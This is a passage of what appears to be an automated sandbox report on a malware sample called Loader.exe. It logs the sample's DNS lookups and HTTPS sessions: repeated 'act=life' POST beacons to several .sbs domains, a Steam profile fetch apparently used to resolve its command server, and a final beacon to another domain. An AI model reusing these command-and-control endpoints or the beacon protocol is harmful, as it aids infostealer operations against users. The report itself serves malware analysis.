Oct 12, 2024 22:36:10.667393923 CEST	192.168.2.6	1.1.1.1	0x799a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:12.166202068 CEST	192.168.2.6	1.1.1.1	0xcff2	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 22:36:02.757307053 CEST	1.1.1.1	192.168.2.6	0x4233	No error (0)	widdensmoywi.sbs		104.21.8.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:02.757307053 CEST	1.1.1.1	192.168.2.6	0x4233	No error (0)	widdensmoywi.sbs		172.67.156.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:03.775693893 CEST	1.1.1.1	192.168.2.6	0x5a0	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:03.775693893 CEST	1.1.1.1	192.168.2.6	0x5a0	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:04.708112955 CEST	1.1.1.1	192.168.2.6	0xd91f	Name error (3)	allocatinow.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:04.772324085 CEST	1.1.1.1	192.168.2.6	0x9c26	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:04.772324085 CEST	1.1.1.1	192.168.2.6	0x9c26	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:05.735029936 CEST	1.1.1.1	192.168.2.6	0x3c8d	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:05.735029936 CEST	1.1.1.1	192.168.2.6	0x3c8d	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:06.700640917 CEST	1.1.1.1	192.168.2.6	0x86c4	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:06.700640917 CEST	1.1.1.1	192.168.2.6	0x86c4	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:07.820810080 CEST	1.1.1.1	192.168.2.6	0xb641	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:07.820810080 CEST	1.1.1.1	192.168.2.6	0xb641	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:08.765737057 CEST	1.1.1.1	192.168.2.6	0x4458	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:08.765737057 CEST	1.1.1.1	192.168.2.6	0x4458	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:09.699343920 CEST	1.1.1.1	192.168.2.6	0x6ed9	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:09.699343920 CEST	1.1.1.1	192.168.2.6	0x6ed9	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:10.674513102 CEST	1.1.1.1	192.168.2.6	0x799a	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:12.175319910 CEST	1.1.1.1	192.168.2.6	0xcff2	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:12.175319910 CEST	1.1.1.1	192.168.2.6	0xcff2	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

widdensmoywi.sbs

mathcucom.sbs

enlargkiw.sbs

resinedyw.sbs

vennurviot.sbs

ehticsprocw.sbs

condifendteu.sbs

drawwyobstacw.sbs

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	104.21.8.37	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: widdensmoywi.sbs
2024-10-12 20:36:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:03 UTC	819	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hdut29ik8bfbdefh98eb2b35dq; expires=Wed, 05 Feb 2025 14:22:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b06avIzXd3Ww3gt3Y8%2BQf0Gt6Z4phsIRUFwrv73hoj37KNb7ZVd0YtTlPQhOPODE3%2BVDeTtvsTXKT5hKh4szoLrhVV4Pg2SOhahgpKCOjPo4XyJVXCk9LzcYXV9SPRmPu%2BOu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1413bf45e70-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:03 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	188.114.96.3	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:04 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-12 20:36:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:04 UTC	813	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eeas88ulsiudm1bq7oeca8o3s0; expires=Wed, 05 Feb 2025 14:22:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTZFwGZVFfkJnMAnYZ4eBSlLZT9ti6uoGjlX%2ByKOV6240udsJNSud3m9CLgNzkFqiKNcZbQT%2BRUJvT3XLh8mTUvobYr28wxcUDXlpxLir8g7lGjAFPBg458VNzb7m1d2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1472bd642bb-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	104.21.33.249	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:05 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-12 20:36:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:05 UTC	815	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s484toj1lupdqa0fj8imr48cao; expires=Wed, 05 Feb 2025 14:22:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRmp04bXJKwPUpVuymtqV756B5UOrGSBdenyAavWc310BurAbeWjZH2J8IPjp%2BpibA8sy0RVtY1mBQv19v870itxvzDxOl0EwhCfa7EfRLaQM0xUBTY%2BCG3MlBh%2FeEJ2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e14d6fb54239-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49718	172.67.205.156	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:06 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-12 20:36:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:06 UTC	811	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=29hhisojo58794akfo3u5h9mnq; expires=Wed, 05 Feb 2025 14:22:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGgTHS18HVoL1ONg01udwWJWsh9eNJaEq3TaQmL1irkxmByY0zqTfDfbrQTdimOKVSHYpS4hDcyI1C8%2BAC8sKit3rG3wHix99MfbUSeFhSmvIUKk1eds3kq2NG1Elkj3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1535f50421c-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49720	172.67.140.193	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:07 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-12 20:36:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:07 UTC	821	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cii25l5c41jal3qa9gg6qhu2aa; expires=Wed, 05 Feb 2025 14:22:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiYcdeNydOKI1YEiJbtWBbpqmYqHLsLm7%2Fk9EEHnmdg6HUoxvBP8U9Z%2FpFxWQD61GvHUccWvBihrzSi2JSAwVYNS4wpfwEaBfmqalBD07KnjeojV6sqnhpgNAMij7KmXwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1596d750f47-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49721	172.67.173.224	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:08 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
2024-10-12 20:36:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:08 UTC	821	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=av1djgm2qa728pc40tuvrn06q1; expires=Wed, 05 Feb 2025 14:22:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29Pcx2Sz5oK6NsRh2EFCm4tD1vTXVw36TmhX%2BuWOnpbf%2FAniYl6Aa3vvSbPhLmJv6tZX%2B2jmXZIzuD6Q0vhyOaFkuNsA3fgiHuLpWyag45UNKL9rir0DLOdrK1KULFG25Ow%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1605ddb7d00-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49732	104.21.79.35	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:09 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-12 20:36:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:09 UTC	823	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=686o0uv57irhr2n8nv8fc1qjtc; expires=Wed, 05 Feb 2025 14:22:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MY9WdvHGsQ%2FTdcZCs1BB49KQTAyYPNQnvhnjgJ3UUphjdukiqcdm7X4DQ5nW8TEv6wMFdkXzq%2F%2BqCk%2FyxzJbvUDTkbeJKi9SW9au%2Br8cyaUaA8nRANiEs8g55CfQx5upHHlj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e1663a0543fd-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49738	188.114.96.3	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:10 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-12 20:36:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:10 UTC	821	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c5d7orcj2qj0t2prf3si89tgcm; expires=Wed, 05 Feb 2025 14:22:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIaePxbTrYWoSDwYfXSEhmO0YFmRFntuOXY13V9YwE54sdUEB5XqvUVM02HACB6cK6BVCzuQ4m46Fh3GSNRpwr2oeLqcWUyynOH4oYVHmuNibL23s4dQ8vDul8tdcGpCKiR0SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e16c59cc4257-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49744	104.102.49.254	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:11 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-12 20:36:12 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 12 Oct 2024 20:36:11 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=bba236ef271ebe3440b984ee; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-12 20:36:12 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-12 20:36:12 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-12 20:36:12 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-12 20:36:12 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49755	172.67.206.204	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:12 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-12 20:36:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 20:36:12 UTC	551	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdF03%2BedDimf763cLAvUtYcRjMbSHekTFW53933EhrJVvkEZsO%2FZv6oUwBppUxWgxMBQ8VWvrf23wjUSsvYpqFV1u6iCIWgBEHM0EWMNeujXXJm94f5bLpnxl96hw9bOgEix0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e17b99277d1e-EWR
